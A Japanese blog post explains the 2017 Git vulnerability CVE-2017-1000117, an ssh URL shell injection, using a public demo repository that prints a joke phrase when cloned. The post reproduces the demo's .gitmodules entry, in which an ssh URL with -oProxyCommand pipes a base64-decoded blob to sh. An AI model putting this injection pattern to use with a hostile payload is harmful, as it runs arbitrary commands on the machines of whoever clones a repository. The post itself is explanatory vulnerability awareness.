BppLOG

Berlin → Tokyo

Gitの脆弱性によってリポジトリをクローンすると「うんこもりもり」と表示される


ビットコイン取引高日本一の仮想通貨取引所 coincheck bitcoin


8/11にGitの脆弱性 ( CVE-2017-1000117 )が出ていました。
CVE-2017-1000117 - Red Hat Customer Portal

これは、gitクライアント上での任意のshellコマンド実行の可能性があります。

重要度 - Important


Gitでの"ssh"URLハンドリングにshellコマンドインジェクションの欠陥が見つかりました。これを利用して、悪意のあるレポジトリや悪意のあるコミットを行われたをレポジトリに対して"clone"アクションをGitクライアントで実行した際に、Gitクライアントを実行したユーザの権限でshellコマンドを実行される可能性が有ります。

Gitの脆弱性 ( CVE-2017-1000117 ) — | サイオスOSS | サイオステクノロジー

実際にどんなことが起きるか

百聞は一見にしかず。

このリポジトリを clone するとターミナルに「うんこもりもり」と表示されてしまいます。
GitHub - greymd/CVE-2017-1000117: Check Git's vulnerability CVE-2017-1000117

リポジトリにある説明文もなんともシュール。

The sentence 「うんこもりもり」(which means like "Lots of shit.")

実行してみるとこのように表示されます。

f:id:tky_bpp:20170815182904p:plain

今回であれば下記のように .gitmodulessubmodule にシェルが仕込まれていますが、リポジトリ上で確認できるので攻撃としての利用は難しい気がします(*下記追記)がどうなんでしょう。

[submodule "subs/morimori"]
    path = subs/morimori
    url = ssh://-oProxyCommand=echo ZWNobyBINHNJQURuTmtWa0FBNFdSVVE3QUlBaEQvemtGS2Vmci9YK0hMc0dpY1hPSmNiNWFzTHE3Zy9UL1lXTWlWUXM5QnhaTUtUQVdVWlRZN0NDdVRjb1FWeTFnaHhMdkQ3VVpMdW1xT1ZmWllHMWdqSEp0MTJmZnVESWJhWVRTeUs4aXViTlpFU0dCUlBSclhaaGwyNUVScjlqRDE4RVBacHRVQklkTll6Tkh6YzIzbDd3eGV3Qy96SHMvV0FJQUFBPT18YmFzZTY0IC0tZGVjb2RlfGd6aXAgLWQgPiAvZGV2L3R0eQo= | base64 --decode | sh /sub1


(追記 2017/08/22)


サイバーセキュリティプログラミング ―Pythonで学ぶハッカーの思考

サイバーセキュリティプログラミング ―Pythonで学ぶハッカーの思考

  • 作者: Justin Seitz,青木一史,新井悠,一瀬小夜,岩村誠,川古谷裕平,星澤裕二
  • 出版社/メーカー: オライリージャパン
  • 発売日: 2015/10/24
  • メディア: 単行本(ソフトカバー)
  • この商品を含むブログ (11件) を見る
体系的に学ぶ 安全なWebアプリケーションの作り方 脆弱性が生まれる原理と対策の実践

体系的に学ぶ 安全なWebアプリケーションの作り方 脆弱性が生まれる原理と対策の実践

実践CSIRT 現場で使えるセキュリティ事故対応

実践CSIRT 現場で使えるセキュリティ事故対応